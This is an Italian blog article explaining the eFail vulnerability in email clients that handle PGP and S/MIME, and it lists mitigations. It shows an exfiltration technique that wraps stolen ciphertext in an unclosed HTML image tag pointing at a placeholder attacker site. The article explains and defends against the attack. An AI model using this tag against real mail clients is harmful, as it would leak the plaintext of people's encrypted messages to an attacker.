Ecco come funziona l’attacco eFail contro le e-mail criptate con i protocolli PGP e S/MIME

Ecco come funziona l’attacco eFail contro le e-mail criptate con i protocolli PGP e S/MIME

Ecco come funziona l’attacco eFail contro le e-mail criptate con i protocolli PGP e S/MIME

I ricercatori di sicurezza hanno rilasciato in anticipo i dettagli di una serie di vulnerabilità scoperte nei client di posta elettronica per due standard di crittografia email ampiamente utilizzati, PGP e S/MIME, dopo che qualcuno aveva divulgato il proprio documento su Internet.

PGP e S/MIME sono noti standard di crittografia end-to-end utilizzati per crittografare le email in modo che nessuno, nemmeno la società, il governo o i criminali informatici, possano spiare le tue comunicazioni.

Prima di spiegare come funziona la vulnerabilità, va notato che il difetto non risiede negli stessi standard di crittografia email; invece, influisce su alcuni client e plugin di posta elettronica che implementano le tecnologie in modo errato.

Soprannominato eFail dai ricercatori, le vulnerabilità potrebbero consentire ai potenziali autori di attacchi di decifrare il contenuto delle vostre email crittografate end-to-end in chiaro, anche per i messaggi inviati in passato.

Secondo il documento pubblicato da un team di ricercatori europei sulla sicurezza, le vulnerabilità esistono nel modo in cui i client di posta elettronica crittografati gestiscono le e-mail HTML e le risorse esterne, come il caricamento di immagini, gli stili da URL esterni.

Ecco come funziona l’attacco eFail:

PGP-encrypted-mail

I client di posta elettronica sono solitamente configurati per decrittografare automaticamente il contenuto delle email crittografate che ricevi, ma se il tuo client è configurato anche per caricare automaticamente le risorse esterne, i malintenzionati possono abusare di questo comportamento per rubare i messaggi in chiaro semplicemente inviandoti una versione modificata della stessa crittografata contenuto di posta elettronica.

Il vettore di attacco richiede il testo in chiaro immesso nella posta crittografata, quindi, utilizzando l’exploit, verrà esportato i dati originariamente crittografati non appena il client di posta di qualsiasi destinatario accederà (o decodificherà) il messaggio

Va notato che per eseguire un attacco eFail, un utente malintenzionato deve avere accesso alle email crittografate, che viene poi modificato nel modo seguente e inviato all’utente per ingannare il client di posta elettronica nel rivelare il messaggio segreto all’attaccante remoto senza avvisarti.

Come descritto nell’attacco proof-of-concept rilasciato dai ricercatori, l’utente malintenzionato utilizza uno dei messaggi crittografati che si suppone di ricevere o che potrebbero aver già ricevuto e quindi lo trasforma in un messaggio email HTML multipart, oltre a forgiare il ritorno indirizzo, quindi sembra provenire dal mittente originale.

Nella email nuova, l’attaccante aggiunge un tag di immagine non chiusa, come questo <img src = “https://attackersite.com/ poco prima che il contenuto crittografato e finisce con l’aggiunta alla fine del tag di immagine, in questo modo: . jpg “>, come mostrato chiaramente nello screenshot.

Quando il tuo client di posta vulnerabile riceve questo messaggio, decrittografa la parte cifrata del messaggio dato nel mezzo, e quindi tenta automaticamente di rendere il contenuto HTML, cioè il tag immagine con tutto il testo decrittografato come nuovo nome dell’immagine, come mostrato di seguito.
PGP-smime-mail-crittografia

Poiché il client di posta elettronica tenterà di caricare l’immagine dal server controllato da un utente malintenzionato, l’utente malintenzionato può acquisire questa richiesta in arrivo, in cui il nome file contiene il contenuto completo dell’email crittografata originale in testo semplice.

Sebbene PGP sia stato progettato per mostrarti una nota di avviso se l’integrità della tua email è compromessa, alcuni client di posta elettronica non visualizzano questi avvisi, consentendo a eventuali potenziali aggressori di eseguire attacchi eFail con successo.

Come prevenire gli attacchi eFail

email-hacking

In generale, è molto difficile per un consulente intercettare anche le email crittografate, ma per le persone che usano disperatamente la crittografia delle email attirano sempre attaccanti sofisticati e sofisticati.

Eliminare l’uso di PGP o S/MIME per prevenire attacchi eFail sarebbe un consiglio stupido, in quanto è abbastanza facile attenuare i problemi segnalati.

Gli utenti possono passare a un buon client di posta elettronica che mostra sempre un avviso quando l’integrità delle email è compromessa e non rende automaticamente le e-mail HTML per impedire il caricamento automatico delle risorse esterne.

I ricercatori consigliano inoltre agli utenti di adottare un algoritmo di crittografia autenticato per comunicazioni sensibili.

La ricerca è stata condotta da un team di ricercatori, tra cui Damian Poddebniak, Christian Dresen, Fabian Ising e Sebastian Schinzel dell’Università di Scienze Applicate di Munster; Jens Müller, Juraj Somorovsky e Jörg Schwenk della Ruhr University di Bochum; e Simon Friedberger di KU Leuven.

Per ulteriori dettagli approfonditi sulla tecnica di attacco, è possibile accedere a questa pagina informativa sull’attacco eFail e al documento [ PDF ] intitolato “Efail: Breaking S/MIME e OpenPGP Email Encryption utilizzando i canali di Exfiltration”, pubblicato dal ricercatori.

Michele Minister

Ciao e benvenuto nel mio sito e voglio dirti Chi Sono, innanzitutto parto col dire che mi chiamo Marco Martini ma sono anche chiamato Michele Minister dato che Michele è il mio secondo nome e Minister è il nickname che ho da sempre utilizzato su tutti i giochi e quindi li ho messi insieme dato che non volevo utilizzare il classico Nome e Cognome per creare un sito. Ho soli 17 anni e svolgo parallelamente alla scuola la professione di Webmaster e Divulgatore Informatico, sono sempre stato timido ed insicuro ma con il diffondersi maggiormente delle nuove tecnologie e di Internet, mi sono avvicinato a questo nuovo mondo che ho sempre reputato il migliore.

Lascia un commento

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.

×
WhatsApp chat